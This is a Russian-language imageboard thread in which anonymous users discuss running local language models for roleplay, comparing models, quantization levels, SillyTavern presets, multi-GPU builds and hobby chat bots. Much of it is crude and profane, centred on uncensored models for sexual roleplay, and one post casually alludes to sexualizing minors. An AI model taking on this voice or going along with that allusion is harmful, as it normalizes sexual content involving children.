Аноним 25/04/25 Птн 18:40:51 #287 №1175554 DELETED

какую нейросетку юзать для кодинга?

Аноним 25/04/25 Птн 18:53:40 #288 №1175581

>>1175554
Гемини 2.5 про

Аноним 25/04/25 Птн 19:02:44 #289 №1175615

>>1172459
Бамп

Аноним 25/04/25 Птн 19:12:19 #290 №1175639

>>1174852
На куморп тестил, РУ карты из этого(?) или соседнего aicg треда. Пресет: (если нужен) https://files.catbox.moe/olnbt9.json

По ощущениям, русский не то чтобы более живой, скорее в саму модель больше информации заложено, поэтому и более инициативная/лучше держит персонажа (хотя и упарывается в крайности) чем немо и ее файнтюны.

Первые два-три сообщения могут быть диким (или не очень диким) шлаком: проебы в окончаниях; просто плохого качества, но если за ручку довести до 4-5 ответа, дальше держит неплохо.

Аноним 25/04/25 Птн 19:12:21 #291 №1175640

174559731093066337.jpg

Аноны, не стукайте только сильно. Первый день вкатился в эти ваши ИИ. Это норм результат или так себе? Я просто хз как и где сравнивать

Аноним 25/04/25 Птн 19:15:14 #292 №1175646

>>1175640
Если тебе нравится - значит норм, не ориентируйся на нас

Аноним 25/04/25 Птн 19:15:32 #293 №1175649

>>1175640
Простыню не читал. Чего хотел-то?

Аноним 25/04/25 Птн 19:17:06 #294 №1175653

>>1175640
У нас парадокс.
Гемма лучшая в русском до 123б
Но так же она пиздец соевая и покумить с ней не выйдет
Следовательно лучше сразу садиться на большие гемини/дипсик у которых русский в сто раз лучше и которые такие же соевые
Но почему то все равно выбирают геммк

Аноним 25/04/25 Птн 19:17:31 #295 №1175654

>>1175640
Вопрос у тебя очень абстрактный. Ведь нужно знать, какое у тебя железо, какие настройки, какие ожидания. К тому же, результата здесь почти и нет: все может сломаться спустя N сообщений и т.д.

Вот он говорит правду >>1175646
Главное, чтобы тебе нравилось. Изучай все, пробуй новое в своем темпе. Тут в основном срачи и битва бакуганов, ни на кого не ориентируйся
"моя геммочка круче твоего магнума! неееет ты не понимаешь!"

Аноним 25/04/25 Птн 19:18:17 #296 №1175659

>>1175287
Так ну модель я скачал. А как настройки то подгрузить? Mistral-V7-Tekken-T чего то не импортируется.

Аноним 25/04/25 Птн 19:20:08 #297 №1175664

>>1175659
Как это не импортируется? Это именно что файл для импорта в Таверну.

Во вкладке Advanced Formatting нужно выбрать Master Import и указать файл. Удостоверься, что файл в формате json, если ты создаешь его вручную и копируешь туда содержимое.

Аноним 25/04/25 Птн 19:20:39 #298 №1175666

>>1175653
А что за 123б ? У геммы 3 вроде максимум 24b

Аноним 25/04/25 Птн 19:21:28 #299 №1175670

>>1175640
Карточка использует белый текст для действий т.е без звездочек *, а у тебя серый текст в первом её ответе. Это значит что форматирование проебалось.
Её ответ слишком короткий, вероятно семплер MinP завышен.
8-бит это оверкилл.
>>1175654
Аморальная дает , если ты конешно, не собираешься няшить лолек.

Аноним 25/04/25 Птн 19:25:40 #300 №1175675

>>1175640
Складность речи - не самый надежный показатель. Хорошо, если она сможет совладать с разными ситуациями, не вставая со стула многократно, не чтобы не сжимала губы в кулаки.

Если хочется от ии какой-то реакции на что-то, то хорошо, если она может сказать интересное, а не однобразную общую хрень типа "Вот видишь, ты теперь понимашь, что значит такое-то такое-то. Но помни, что не все просто."

Аноним 25/04/25 Птн 19:27:02 #301 №1175677

>>1175654
>К тому же, результата здесь почти и нет: все может сломаться спустя N сообщений и т.д.

Вроде стабильная, чатился больше часа, весь контекст на удивление помнит, но как только решил сделать уклон в "малинку" сразу пошел нахуй. Для тестов скачал точно такую же расцензуреннцю версию от разных авторов, но они настолько тупые, что просто ппц, как будто 3х летний шиз. напомнило вкат в ИИ года два назад, когда ставил ебучую ламу и она делала высер состоящий из иероглифов, лол

Аноним 25/04/25 Птн 19:29:00 #302 №1175681

>>1175664
Ну да я так и делаю
> Во вкладке Advanced Formatting нужно выбрать Master Import и указать файл
файл соответственно в json. Просто ничего не происходит и все. В выборе есть Mistral-V2 и V7 но именно этого V7-Tekken-T нет. Я даже проверил где V7 лежит, но тот старый. Таверну перезапускал.

Аноним 25/04/25 Птн 19:30:01 #303 №1175683

>>1175670
А есть какой то гайд по этому форматированию? Что бы все четко сделать.

>8-бит это оверкилл.
Это типо плохо или хорошо? Нихуя не понятно

Аноним 25/04/25 Птн 19:30:52 #304 №1175684

>>1175681
После импорта файла таким образом, настройки должны примениться самостоятельно. Не знаю, что у тебя происходит. Скриншоты присылай. Файла, что внутри него, момент импорта, что во вкладке advanced formatting после импорта.

Аноним 25/04/25 Птн 19:37:04 #305 №1175686

>>1175343
Пили теперь PR на гитхаб.

Аноним 25/04/25 Птн 19:43:23 #306 №1175692

>>1175683
Можно поставить 6 или даже 5 бит без заметной потери качества, но с заметным увеличением скорости.

Аноним 25/04/25 Птн 19:46:38 #307 №1175694

Desktop Screenshot 2025.04.25 - 21.40.44.17.jpg

Desktop Screenshot 2025.04.25 - 21.45.04.69.jpg

>>1175684
Там после импорта ничего не происходит и есть только старые настройки V3 V7 и т.п. которые при установке таверны были.

Аноним 25/04/25 Птн 19:49:30 #308 №1175699

lol.png

>>1175694
Анон... У тебя в файле html код страницы. Это не json.
Вот json: https://huggingface.co/sleepdeprived3/Mistral-V7-Tekken-T/raw/main/Mistral-V7-Tekken-T.json

Аноним 25/04/25 Птн 19:51:13 #309 №1175702

>>1175699
Бля... точно, твой загрузился сразу.

Аноним 25/04/25 Птн 19:51:42 #310 №1175705

Если уж совсем на пальцах - не сохраняй себе страницу. Выделяй всё через Ctrl+A и копируй в пустой файл формата .json

Аноним 25/04/25 Птн 19:53:59 #311 №1175713

>>1175666
123больших хуя в жопу.

Аноним 25/04/25 Птн 20:39:55 #312 №1175764

>>1175554
Квенкодер, qwq, гемму сойнет 3.7
>>1175640
Ну, в целом так себе. Обычно хочется иметь более описательные посты, где помимо этих действий хотябы несколько фраз про окружение, действия, вид и т.д. Сильно много тоже плохо офк.
Если дальше оно разговаривается, действует а не тупит и в целом тебе чат нравится - используй и довольно урчи. Если оно и дальше такое же унылое и просто отбрехивается ничего не делая - нужно фиксить, начать с промта.
>>1175653
> садиться на большие гемини/дипсик
Эй, кожевенник, aicg 2 блока ниже.
>>1175666
Только одна модель - мистраль лардж, уже довольно старая. Из посвежее - есть коммандер на 105б, противоречив.

Аноним 25/04/25 Птн 21:05:43 #313 №1175785

>>1175683
>>1175692
Можно поставить 4 бита без заметной потери качества. Зависеть будет от модельки (наверное), но в большинстве случаев берешь Q4 KM и не паришься.

Сильные просадки с третьего кванта начинаются

Аноним 25/04/25 Птн 21:09:39 #314 №1175790

Мужички, вопрос на засыпку. Накидал через гемини себе бота для ТГ с интеграцией опенроутера, чтоб для себя удобно кумить на русском
Вот "description" это описание для меня я так понял
А "system_prompt" описание персонажа должно быть
Как его составлять лучше? Че кроме описания персонажа добавлять? Чтоб из роли не выходил и все такое

Аноним 25/04/25 Птн 21:20:18 #315 №1175798

Карточки, в которых есть Example Dialogue работают гораздо лучше. Карточки без примеров диалога использовать не нужно. Прав или нет?

Аноним 25/04/25 Птн 21:33:20 #316 №1175801

>>1175798
Не используй.

Аноним 25/04/25 Птн 22:02:24 #317 №1175832

>>1175263
Старик Хэмлок

Аноним 25/04/25 Птн 22:43:29 #318 №1175870

Кто юзает ТаббиАПИ - по сравнению с Угабугой насколько быстрее? Посмотрел на Гитхабе - на вид сыровато и недружественно к пользователю. Потрахаться можно конечно, если прирост хороший. Есть смысл?

Аноним 25/04/25 Птн 22:44:59 #319 №1175873

>>1175343
>за эту неделю разобрался в жоре и переписал серверную часть так, чтобы она работала как единый бекенд для нескольких видеокарт
Наш Слоняра. На Гитхаб однозначно!

Аноним 25/04/25 Птн 22:51:00 #320 №1175878

>>1175343
> 2080ти@22
Больной ублюдок, красава. Расскажи лучше про ее перфоманс, вот это интересно.
И для какой модели первые метрики?
>>1175870
Из плюсов - поддержка многих функций чаткомплишн апи, детальные метрики по обработке контекста и генерации. По скорости заметных преимуществ не будет, только если в одном случае будет более новый торч и обновленная сборка.

Аноним 25/04/25 Птн 23:14:33 #321 №1175900

>>1175528
>Можешь посоветовать какой райзер купить под 4060 Ti 8G?
Вообще не ебу. У меня PCI 3.0 на материнке и карты воткнуты либо через 3.0 райзер (вроде норм), либо через х1 майнерские, либо х4 nvmeшные.

>>1175686
>>1175873
Разве что в форме драфта или еще какой-то хуйни а-ля proof of concept, потому что реализация оче грязная и завязана именно на мой кейс, и для других случаев (когда, например, через rpc соединяли 3 машины) все сломается к хуям. Я там просто ворвался с ноги и расхерачил все абстракции, завязавшись на rpc. По-хорошему, там нужно писать новый multi-gpu rpc бекенд в парадигме жориных интерфейсов, но мне впадлу такое.

>>1175878
> 2080ти@22
>Больной ублюдок, красава. Расскажи лучше про ее перфоманс, вот это интересно.
После нее я с отвращением смотрю на теслы, потому что сейчас они стоят дороже, а она перформит лучше 3060. По крайней мере, в жоре. Если бы вместо тесел были бы они, то 2+ т\с мне были бы обеспечены, я думаю. Но кто ж знал, я-то про нее только из этого треда узнал недавно...
>И для какой модели первые метрики?
Ну для сайнемо, написал вроде. Когда был хайп в треде, я ее тоже скачал, проблевался, но файлик остался на диске. Вот для тестов пригодился.
К слову, те немногие сообщения для 405B выглядили хорошо. Мб плацебо, конечно, но показалось поинтереснее мистралевских. Сцук, хочется покумить на ней...

Аноним 25/04/25 Птн 23:26:44 #322 №1175931

Чуваки, на какой температуре вы рпшите на даркнесс рейгхе?

Аноним 25/04/25 Птн 23:29:22 #323 №1175935

>>1175528
>На озоне большой выбор и непонятно какой лучше
Это только так кажется. Бери только из больших магазинов и с кучей отзывов, а то могут прислать такой подвал, что и карту сожжёшь. Вариантов немного.

Аноним 25/04/25 Птн 23:30:36 #324 №1175936

>>1175900
> Ну для сайнемо, написал вроде.
Ээээ 12б?
> а она перформит лучше 3060
Годнота, а цифры конкретные не замерял на ней, или только в общем составе пробовал?
> Сцук, хочется покумить на ней...
Медленно но верно! Можешь отвязать одну карточку и генерировать на ней нарисованных голых девок пока составляется ответ, дабы не скучать.
Алсо, дипсик не пробовал пускать? Раньше жора дистрибьютед с ним вообще не дружил и не мог поделить, но может сейчас справится. Скорости в теории должны быть высокими.

> Eurydice-24b
Какие настройки для нее рекомендуются? И вариации мистрал-теккен, и чатмл, и кастомные - везде +- сейм. Пассивная, короткие ответы по 120-240 токенов с передачей инициативы. Постоянные мелкие фейлы - чар ищет кофемашину и запускает ее, следующим постом вручную перемалывает зерна и ставит на огонь, со входа чар не представляется (сетка при этом юзает имя в действиях и описаниях), на вопрос "а ты кто?" в ответ "Какой ты забывчивый, это же я...". Чары обращаются к тебе по имени, хотя не знают тебя, забывают о планах и сутра "проснись и пой, соня, что сегодня будем делать?". Даже в коротких сообщениях много swaying hips и оно может слишком продвинуться вперед, не дождавшись действий юзера. Чднт?

Аноним 25/04/25 Птн 23:49:17 #325 №1175971

>>1175931
Минимум 38 градусов, весь обливаюсь потом и предэякулянтом с хуем в руке

Аноним 25/04/25 Птн 23:51:00 #326 №1175973

>>1175971
>Минимум 38 градусов

Это уже к врачу.

Аноним 25/04/25 Птн 23:55:44 #327 №1175982

>>1175242
Хм-хм… 10, 11, 12, 13, 13… Хотя бы по 7к на коммуналку с едой… 3x12+4x12+5x12+6x12+6x12… 288к… Ну там, одежда иногда, обувь, по мелочи…
ЗВУЧИТ РЕАЛИСТИЧНО!!!

———

Решил я седня поставить ktransformers ради спортивного интереса.
И обосрался:
subprocess.CalledProcessError: Command '['cmake', '/home/user/ktransformers/csrc/balance_serve', '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=/home/bahamut/ktransformers/build/lib.linux-x86_64-cpython-311/', '-DPYTHON_EXECUTABLE=/home/user/anaconda3/envs/ktransformers/bin/python', '-DCMAKE_BUILD_TYPE=Release', '-DKTRANSFORMERS_USE_CUDA=ON', '-D_GLIBCXX_USE_CXX11_ABI=1', '-DLLAMA_NATIVE=ON', '-DEXAMPLE_VERSION_INFO=0.2.4.post1+cu126torch27avx2']' returned non-zero exit status 1.
error: subprocess-exited-with-error

В гите куча ишью по этому поводу, у кого-то починилось, у большинства нихуя не работает.
Огорчение, жду, пока пофиксят.

Аноним 26/04/25 Суб 00:14:33 #328 №1176003

Пиздец, медленно подводил нейронку к поцелую, устроил там кино вино, сука, меня отшили, охуеть. Первый раз такое в жизни. С реальными тянками дак прокатывает, а эта хуйня решила повыпендриваться. Теперь опять думать над сюжетом, чтоб сойтись и чтоб мне понравилось

Аноним 26/04/25 Суб 00:20:17 #329 №1176014

>>1176003
Так это ахуенно, хоть какое то отклонение от букетно - конфетного сценария с поебушками, ты просто ещё этого не понял.

Аноним 26/04/25 Суб 00:24:05 #330 №1176023

>>1176014
Дак в этом и дело, у меня был сценарий, сейчас и не должны были быть поебушки, хотел потянуть там дней 7 по истории, ну либо на сколько фантазии хватило. А тут такое. Честно, я думал нейронка всегда только поддакивает юзеру

Аноним 26/04/25 Суб 00:26:59 #331 №1176034

> QwQ-32B-Snowdrop-v0
Вот это прям хорошее, наконец можно сказать что основательно потестил. Нет ощущения всратого безумного копиума (особенно на контрасте с херней), выдача приятная и ламповая, настолько что на какие-то недостатки просто хочется закрыть глаза и погружаться.
Штатный синкинк - неоче, зато с костылем stepped thinking очень хорошо и последовательно. Запромченый стиль речи подхватывает, выражения относительно чистые, но иногда выдает такую платину, от чего орешь в голосину.

>>1175982
> поставить ktransformers ради спортивного интереса
О, добро пожаловать в клуб. Просто создай ему свой венв системным пихоном, поставить туда базовое окружение с нужным торчем, и дальше запускай по порядку сборку, только с учетом того что в прошлых тредах обсуждалось.
>>1176003
Нажми стрелочку справа если не нравится

Аноним 26/04/25 Суб 00:32:17 #332 №1176049

>>1175982
пакет nvidia-cuda-toolkit стоит?

Аноним 26/04/25 Суб 00:37:41 #333 №1176063

>>1176034
>Нажми стрелочку справа если не нравится

Голоса в голове не позволяют, сорян.

Аноним 26/04/25 Суб 00:40:14 #334 №1176069

>>1176034
>>1176063
>Нажми стрелочку справа если не нравится
Ну по факту слишком просто, никакой соревновательности не чувствуется. Максимум чуть чуть редактировать ответы, но перегенерировать их ломает все повествование

Аноним 26/04/25 Суб 02:05:31 #335 №1176116

https://www.reddit.com/r/LocalLLaMA/comments/1k7o89n/we_compress_any_bf16_model_to_70_size_during/
Сжатие без потерь для любителей крутить полные веса без квантования.
Думаю их тут немного, но все же интересный вывод в посте, что сжатие до ~8 кванта вызывает заметные потери даже на жирных моделях в некоторых задачах.

Аноним 26/04/25 Суб 02:23:51 #336 №1176126

https://huggingface.co/bartowski/THUDM_GLM-4-32B-0414-GGUF

Это лучшая модель которую я пробовал. Вытаскивает из контекста вещи, которые я сам давно забыл; отлично держит чара; аутпуты выдает действительно подходящие под контекст сообщения, никуда не спешит.

Кум проверял, но поверхностно, на первый взгляд пропускает без особых проблем, может быть чуть сухо, но модель пиздец умная и это перевешивает сухость, на мой взгляд. Так или иначе - цензура не геммовская, скорее что-то типо квена.

Контекст и инструкт есть на staging версии таверны, если кто-то захочет затестить - https://files.catbox.moe/8o8gh4.json

Аноним 26/04/25 Суб 02:38:17 #337 №1176132

>>1175936
>Ээээ 12б?
Ага. Или ты думал, что у меня мильен токенов в секунду на ней должно быть?
>Годнота, а цифры конкретные не замерял на ней, или только в общем составе пробовал?
Замерял в общем составе на мистрале 123B. Конкретно не помню, но прирост был норм по моим меркам, поэтому я выкинул из моего go-to конфига 3060 и 3070 ti, и юзаю ее. Получил где-то 1 т\с дополнительно.
>Медленно но верно! Можешь отвязать одну карточку и генерировать на ней нарисованных голых девок пока составляется ответ, дабы не скучать.
Я пробовал генерить, так там хуета выходила. Потом узнал, что там чуть ли не на каждую позу надо лору искать. В пизду, лень этим заниматься. Да еще и нельзя задействовать несколько карт, чтобы, например, в более высоком кванте модель брать. Хотя наверное это не так актуально там, наверняка ж 95% людей сидят с картами не больше 24 gb. Хз, все равно как-то сложна все выглядело, с ллм проще все. Хотя признаю, что может просто еще не распробовал. Но лень вкатываться...
>Алсо, дипсик не пробовал пускать? Раньше жора дистрибьютед с ним вообще не дружил и не мог поделить, но может сейчас справится. Скорости в теории должны быть высокими.
Я купил себе 128 гб памяти и у меня 138 гб VRAM. Математика говорит, что у меня 266 общей памяти. Очень
щедро округлим до 260 Гб, все же система тоже там сколько-то гб рама удерживает. Я скачал рекомендуемый 2 квант от анслота, который весит 248 Гб. Попытался запустить это в жоре. Он же, говно ебаное, блять, при аллокации 30 лееров на гпу (а модель имеет 61 леер, для справки - т.е. я этой твари даже фору даю - у меня соотношение vram/total 0,53, а 30/61=0,49) пытается аллоцировать чуть больше 24 гб на первой 3090 и падает с out of memory, блядь! И это даже без контекста, потому что я выставлял q8_0 и картина была аналогичная. У меня просто нахуй сгорело от этого. Мало того, что это поделие до сих пор нахуй заставляет меня вручную менеджить распределение слоев по картам, так даже при этом оно выкобенивается. И при этом, к слову, он всю RAM сжирает.
В результате я поставил ktransformers, вроде собрал его, но еще не пробовал запускать. Там гайды какие-то страшные. Что блять за марлины? Каво, какие yaml? Т.е. одно поделие меня заставляет слои подгонять, а тут вообще надо каких-то марлинов считать в конфигах, ебаный бред. В общем, меня одолели сомнения и нежелание разбираться, поэтому я пошел допиливать свой фикс rpc и тестить 405B. Может и дипкок попробую, только для этого надо бы накатить мои правки на свежего жору, вдруг там что для мое появилось. А потом ждать час-два, пока он тензоры закеширует... А потом в ебало 1 т\с прилетит. Лучше все же попробовать сначала разобраться в марлинах ебучих, там хоть результат обещают достойный, да и он на одной машине будет без ревущих тесл. Только есть одна проблемка - 2080 ti это тьюринг, а он с ktransformers вроде совсем плохо дружит, так что надо будет, видимо, вставлять другую 3060 вместо нее и терять 10 гб врам. Фух, выговорился.

Аноним 26/04/25 Суб 03:13:46 #338 №1176157

>>1176126
Спасибо, анончик, и за формат особенно. Сейчас будут пробовать этот некстген.
>>1176132
> Или ты думал, что у меня мильен токенов в секунду на ней должно быть?
Ну типа это как-то оче медленно, одна тесла в q8 даст столько же или больше. Но если это был именно тест латенси всей этой системы с раскидыванием весов - тогда уже есть смысл, да.
> чуть ли не на каждую позу надо лору искать
> нельзя задействовать несколько карт, чтобы, например, в более высоком кванте модель брать
Если анимублядь - там с этим все хорошо, промтинг простой и модели все основное знают. Как на реалистике - хз, вероятно тоже. Кванты для диффузии особо не используются, все гоняется в 16битах. Исключение - флакс, но он не для всего подходит и на вялой карте будет ужасно медленным. Несколько карт можно задействовать для одновременной генерации нескольких изображений, но врядли в том кейсе это надо.
> пытается аллоцировать чуть больше 24 гб на первой 3090 и падает с out of memory, блядь
А ты -ts выстави в нужном соотношении, на одной карте больше, на другой меньше. Но с такой памятью скажу сразу что на жоре делать нечего, даже если запустишь, там смешные скорости. Возможно с 256 гигов рама будет веселее.
> он всю RAM сжирает
Он и будет сжирать всю, поскольку аллоцирует в раме также и то, что будет находитсья в врам. no_nmap или подобная опция помогает, но всеравно уг.
Только ktransformers, в бич конфигах между ним и жорой просто пропость. В варианте 192+112 завелось вплоть до 7т/с
> Что блять за марлины?
Марлин - там где гпу генерирует токены, торч - там где гпу обрабатывает контекст. Можешь скопировать мультигпу конфиг, попердолить раскидывание весов по картам (там простые регекспы но в дефолтном тексте есть ошибки). Чтобы выгружать экспертов - раскомментируй блоки в разделе === MLP Experts Replacement ===. Эксперты начинаются с 4-го слоя, вроде как необходимо чтобы слои экспертов находились в пределе диапазона остальных слоев что выгружаются на конкретную карточку.
Ну а так с точки зрения полезности - буквально закрыть ачивку и (поправив код) поиграться с тексткомплишном, который недоступен в обычном апи. Там можно заставить дипсика даже кумить без полотен повторения карточки и рефлекии на 5к токенов, но ответы на уровне 30б.

Аноним 26/04/25 Суб 04:09:24 #339 №1176192

Fallen-Command-A-111B сумел удивить однако. Чего они туда напихали? Такого системного подхода к разврату и от Магнума не дождёшься.

Аноним 26/04/25 Суб 04:15:43 #340 №1176196

>>1176157
Если будешь тестировать GLM, отпишись по поводу своих ощущений, пожалуйста. Меня очень завораживают аутпуты модели, она именно что реалистичная. Не пустая и стерильная как квен, не перегруженная позитивностью как гемма, не меняется от сообщения к сообщению как мистраль. Может смешно звучать, но будто бы присутствует какая то реалистичная иллюзия эмоционального и контекстуального интеллекта? Я вот не пойму, это действительно так, либо я с ума сошёл.

Аноним 26/04/25 Суб 05:17:29 #341 №1176217

pic3.jpg

Хех. Выложу в тред. На коленке собрал забавный мини-проект - бота у которого есть API к мессенджерам, ComfyUI, KoboldCPP, OpenAI API. И добавил недавно лорбук на манер того что можно увидеть в глупой таверне. Ну и добавил автоматическую токенизацию сообщений чтобы собирать всё по бюджету токенов.
В итоге теперь бот серет посетителям дискорда всякой чушью.

Но что-то запромптить так чтобы бот писал и достаточно интересно и не слишком много, чтобы не был унылым ассистентом, да ещё и чтобы свайпать нельзя было та ещё задача.

Как всегда попросил ГПТ сгенерировать персонажа-заглушку.

Интересно где почитать как корректно реализовывать структуру агента. Было бы забавно если бы была какая-то форма этой хуйни. Чтобы например бот мог пойти и самостоятельно найти информацию в духе "где дешевле колбаска, в ближайшей пятерочке, или ближайшем магните".

Аноним 26/04/25 Суб 08:37:22 #342 №1176244

>>1176126
И вот опять, новая модель, и опять не в целевую с 16гб врам, да как так то!
Но нет итт все равно прогреваются на что то меньшее чем 3090.

Аноним 26/04/25 Суб 08:49:29 #343 №1176247

>>1176126
Хз соя как на гемме один в один

Аноним 26/04/25 Суб 09:09:12 #344 №1176254

>>1176247
Где вы находите всю эту сою, что вы делаете там, блядь? С порога хуй достаёте и начинаете тян по щекам хлестать, на кровать ей срёте? Что? Я первый раз всё это вижу.

Аноним 26/04/25 Суб 09:25:11 #345 №1176257

Аноним 26/04/25 Суб 11:57:22 #346 №1176344

Непонел, с какого моча удалила ссылку на реддит которую я ночью кидал?
https://www.reddit.com/r/LocalLLaMA/comments/1k7o89n/we_compress_any_bf16_model_to_70_size_during/
Тут теперь уже и сообщения по теме трут? Совсем ебанулся?

Аноним 26/04/25 Суб 11:59:34 #347 №1176346

>>1176344
А блядь нет, браузер выебывается, сорян

Аноним 26/04/25 Суб 12:03:01 #348 №1176354

Подождите.
Я правильно понимаю что имея всего х2 3090 я смогу запускать 123б в 3 кванте и ещё 4гб на контекст останется?
Там же вроде даже 2 квант уже супер пиздатый без потерь

Аноним 26/04/25 Суб 12:05:44 #349 №1176358

>>1176354
А купив ещё одну 3090 мне станет доступен мистраль лишь на квант выше/3q_l - это уже вообще не стоит того

Аноним 26/04/25 Суб 12:06:17 #350 №1176360

>>1176217
Что за модель так умно пишет?

Аноним 26/04/25 Суб 12:06:35 #351 №1176363

>>1176354
Лучше 70b крути в нормальном кванте

Аноним 26/04/25 Суб 12:08:37 #352 №1176368

>>1176363
В каком месте лучше?
70б пойдет в 4 кванте, 123б пойдет в 3 кванте - у последнего потери минимальны

Аноним 26/04/25 Суб 12:10:10 #353 №1176373

>>1176368
> у последнего потери минимальны
Ноуп, просто тебе не с чем сравнивать 6-8 кванты 123b
Но оно работает, да

Аноним 26/04/25 Суб 12:11:58 #354 №1176379

>>1176003
Что за модель?

Аноним 26/04/25 Суб 12:19:53 #355 №1176406

>>1176354
Лучше купить две 5090.
3090 всё ещё медленные для 123б, будет 10т/сек

Аноним 26/04/25 Суб 12:45:31 #356 №1176454

>>1176360
лол. "умно". Это Gemma3 12b Q4. Её умной можно разве что в категории 12b можно назвать.

Но мне нравится что её можно запустить на 3060 и держать как небольшого ассистента. вызов инструментов у неё прям хорошо работает. например картинка:
В кобольде крутится гемма3+виспер, вместе с этим запущен комфи.
1 Я говорю "хочу картинку с котом" в телегу
2 бот качает аудио, транскрибирует через виспер
3 текст отправляется гемме, гемма поимает что я хочу картинку с котом, форматирует промпт в стиль тегов данбуры и вызывает комфи
4 комфи генерирует картинку с котом и отправляет мне в телегу
классно!

и всё локально.

Аноним 26/04/25 Суб 12:50:52 #357 №1176460

>>1176034
> Просто создай ему свой венв системным пихоном, поставить туда базовое окружение с нужным торчем, и дальше запускай по порядку сборку, только с учетом того что в прошлых тредах обсуждалось.
Угараешь? =D А как я по-твоему делаю?
Ты точно собирал именно llama4 сборку?
Я не против, что дефолтная должна поставится по щелчку пальца. Ошибка в балансире, который не нужен для дипсика, но обязателен для лламы (там так пишут).
Вообще, я прогнал установку и на винде, и на убунту, и результат одинаковый. Но может я косячу где-то.

>>1176049
nvidia-cuda-toolkit is already the newest version (12.0.140~12.0.1-4build4).
Я хз, почему такая версия, может оно отличается от версий самого файла.
12.0 я не устанавливал на систему никогда. =)

>>1176126
В телеге тоже хвалили контекст.

>>1176132
Контекст мега-толстый, не? Ты установил 4096 для контекста?

Дипсик 130 гигов жрет 170. Т.е., модель +30 сверху накинь, я писал это еще когда ты теслы в перемешку с 3090 тыкал.

>>1176217
А мог бы выложить в гит. =D

Аноним 26/04/25 Суб 12:51:46 #358 №1176462

>>1176460
быстрофикс +40 ой

Аноним 26/04/25 Суб 13:10:29 #359 №1176484

>>1176460
>А мог бы выложить в гит. =D
Может и выложу когда оно станет чуть более "продакшн-реди". Сейчас там местами хорошо, местами так себе. Проект держится просто на том что я его в своём контексте держу.

Вообще у меня там классный пайплайн, я всю ключевую логику вынес в основной поток, поэтому все сервисы всегда синхронизированы между собой, а всю многопоточную хуйню вынес отдельно, просто периодически проверяю "оно там закончилось или нет". из-за чего добавление новых сервисов делается максимально просто. плюс разделил логику на задачи специализированные под сервисы и задачи которые могут перемещаться между сервисами, так чтобы там одновременно несколько их работать могло, но по одному на сервис.
В итоге у проекта просто максимальная расширяемость.

Иронично что писал бота чтобы друзьям в дискорд голых кошкодевочек генерировать, а в итоге получил это. И вокруг этого бота ещё одному кабанчику OCR и работу с документами делаю. Притом оно там ему одновременно и документы распознаёт помогая наёбывать на проценты, а в соседнем окне голых кошкодевочек генерирует и всякую срань пишет. Слава технологиям.

Аноним 26/04/25 Суб 13:21:23 #360 №1176494

>>1176484
Очень круто, ждем. Надеюсь, допилишь до состояние удовлетворенности своим кодом. =) Всем хорошо — и тебе приятно, и нам делать ниче не придется.
Интерфейс выглядит богато.
Успехов! ^_^

Аноним 26/04/25 Суб 13:23:37 #361 №1176500

Кум модели новые хорошие до 32В появились? Щас пользуюсь цидонией.

Аноним 26/04/25 Суб 14:09:42 #362 №1176549

Ну что поигрались с немотроном?
Если что чтобы не было таблиц и выбора вставляете
Writing style:
Don't use lists and out-of-character narration.
{char} MUST use narrative format.
Detailed thinking off.
в начало промпта и нужно чтобы в промпте не было четких указаний по локации типа описывай локу подробно каждое сообщение и тд
Если чувствуете сою значит карточка/промпт такие

Аноним 26/04/25 Суб 15:11:48 #363 №1176686

На смартах модели с каким количеством параметров максимально можно запустить? До 3B где-то?

Аноним 26/04/25 Суб 15:20:25 #364 №1176722

>>1176196
По первым впечатлениям потенциал точно есть. Во-первых, пишет интересно, захватывающе, лампово, напоминает коммандера. В одном чате прямо ультанула, очень приятно обыграв. Промту следует хорошо и не ломается, сои пока не замечено (!), но и отказывать умеет.
Достаточно умная и не выдает явных косяков и бреда, который часто бывает.
Потестил пока ограниченно и на рофловых чатах с бросками кости - с разнообразием проблем вообще нет.
Есть и минусы: плохо знает всякие фандомы, когда не совсем понимает ситуацию или что-то не нравится - дает довольно слабый ответ не двигая историю дальше. Возможно проблемы с промтом или история чата не понравилась, надо тестировать больше.
Модель внимания стоит и имеет крутой перфоманс в стоке. Для вердикта нужно больше поюзать, но предварительно рекомендовать можно.
> присутствует какая то реалистичная иллюзия эмоционального и контекстуального интеллекта
Именно когда у модели внимание работает правильно, и она не просто дает вариацию на тему, а воспроизводит естественные действия персонажа с учетом его эмоций, мыслей, окружения такое ощущается. Разумеется, общая концепция, персонаж или что-то еще должны тебе нравиться, тогда в сказку действительно захочешь поверить и проникнешься.

Аноним 26/04/25 Суб 15:21:38 #365 №1176726

>>1176500
новое для кума - https://huggingface.co/ReadyArt/Forgotten-Transgression-24B-v4.1
классика для кума - https://huggingface.co/knifeayumu/Cydonia-v1.3-Magnum-v4-22B

Аноним 26/04/25 Суб 15:34:54 #366 №1176756

>>1176196
>>1176722
Тоже захотелось попробовать. Жаль, на Экслламе 2 не работает. И, судя по словам автора, вероятно и не будет работать. Там немного другая архитектура, и он не хочет проходить через попаболь ради одной модели. В Экслламе 3 будет работать, но та еще слишком сырая.

Аноним 26/04/25 Суб 15:38:15 #367 №1176758

>>1176217
Годнота, не стесняйся делиться. Ну и в любом случае успехов в разработке.
>>1176254
+1, эти шизы даже на коммандера жаловались.
>>1176354
В целом да, но оно будет с налетом лоботомии и контекст много кушает. Как вариант - дождись 3й экслламы, там обещают кванты пободрее, или докупи еще карточку.
>>1176460
> А как я по-твоему делаю?
> /home/user/anaconda3
Действительно, как? Нужен полноценный системный пихон с хидерами (дев версия), а не энв конды. В последней еще оче много замещающих зависимости костылей, который могут помочь в развертывании у хлебушков (тот же куда тулкит встроенный), но при этом не являются полными. Не то чтобы с кондой поставить невозможно, но там как раз лезет такая ерунда.
> Ты точно собирал именно llama4 сборку?
Там единая сборка на всех, чел.
> 12.0
Как там в мезозое? Каким образом ты хочешь чтобы оно что-то собирало из свежего кода? Торч на 12.6 должен намекать.
Блин, тебе же явно об очевидной ошибке сигнализирует, а ты вместо того, чтобы просто на базу внимательно посмотреть, пошел ерунда сочинять.
>>1176756
На третьей будетуже есть, со временем сделают. Тут бы дождаться базовой обертки в апи и уже норм.
А так модель не настолько большая чтобы сильно страдать от жоры, хотябы 15-20т/с на контексте будет.

Аноним 26/04/25 Суб 16:00:48 #368 №1176786

>>1176726
>классика для кума - https://huggingface.co/knifeayumu/Cydonia-v1.3-Magnum-v4-22B
Почему без семплеров?
Как я должен их подбирать если я зелень просто зашёл подрочить?

Аноним 26/04/25 Суб 16:01:57 #369 №1176790

>>1176786
хуй знает. твои проблемы, не мои

